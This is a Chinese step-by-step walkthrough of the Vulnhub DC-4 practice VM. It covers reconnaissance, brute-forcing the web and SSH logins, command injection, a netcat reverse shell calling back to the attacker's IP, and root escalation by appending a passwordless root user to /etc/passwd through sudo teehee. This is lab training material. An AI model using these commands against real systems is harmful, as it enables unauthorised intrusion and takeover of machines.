公司动态

手把手教通关Vulnhub靶场-DC4靶机

📅 2026/7/19 14:56:12
手把手教通关Vulnhub靶场-DC4靶机
一.靶机下载官方链接https://download.vulnhub.com/dc/DC-4.zip网盘链接:https://pan.baidu.com/s/1fpD8PAIJvU-Sqrbj37II4g 提取码: rkp6导入之后要在设置中将其调为NAT模式默认情况我们是不知道靶机的密码的目的是通过kali获取靶机中的flag信息二.靶机信息收集因为靶机与kali处于同一网络状态下使用命令arp-scan -l得到靶机的ip为192.168.194.136使用命令nmap -A 192.168.194.136对靶机进行扫描发现靶机开放了80端口尝试对80端口进行访问正常输入账号密码之后也没有回显用户是否存在所以就先爆破admin用户的密码试试三.爆破用yakit或者bp都可以爆破一下admin的密码使用字典为top10000成功爆破出密码为happy尝试进行登录简单尝试发现可以进行命令执行抓包进行测试是否可以修改命令四.抓包命令执行使用命令id可以发现触发了命令执行但是用户的权限还是比较低的所以尝试去反弹shell然后进行提权使用命令nc -lvvp 1111nc-e/bin/bash192.168.194.1341111获取交互式shell使用命令python -c import pty; pty.spawn(/bin/bash);五.提权查看系统的版本号在msf中查找是否有对应版本号的漏洞利用使用命令cat /proc/versioncat /etc/issue使用命令searchsploit 4.9.30 Debian并没有找到对应内核的提权漏洞换个思路使用命令cat /etc/passwd根据uid1001-1003可以知道charlesjimsam是系统的普通用户逐个查看charlesjimsam的目录charles和sam目录并没有发现什么jim目录却发现了一个备份文件存在使用命令ls -l /home/jim使用命令cd /home/jimls backupscat backups/old-passwords.bak将这里密码全都复制出来然后创建一个叫password.txt 的文件然后去爆破jim用户的ssh密码使用命令hydra -l jim -P password.txt ssh://192.168.194.136成功爆破出密码是jibril04,接着使用jim账号登录ssh使用命令ssh jim192.168.194.136一个一个查看之后发现mbox里面存在可利用信息这说明jim用户是有查看邮件的权限的使用命令cd var/maillscat jim发现了charles的密码是^xHhAhvim0y使用该密码切换到charles用户使用命令su charles使用命令sudo -l可以具有/usr/bin/teehee这个命令可以让我们新增一个超级管理员用户使用命令echo test::0:0::root:/bin/bash | sudo teehee -a /etc/passwdcd /rootlscat flag.txt成功获取最后的flag如有错误请大佬们指正到这里我们也是成功通关了DC4靶机后续会接着更新DC系列的靶机通关教程请多多关注一下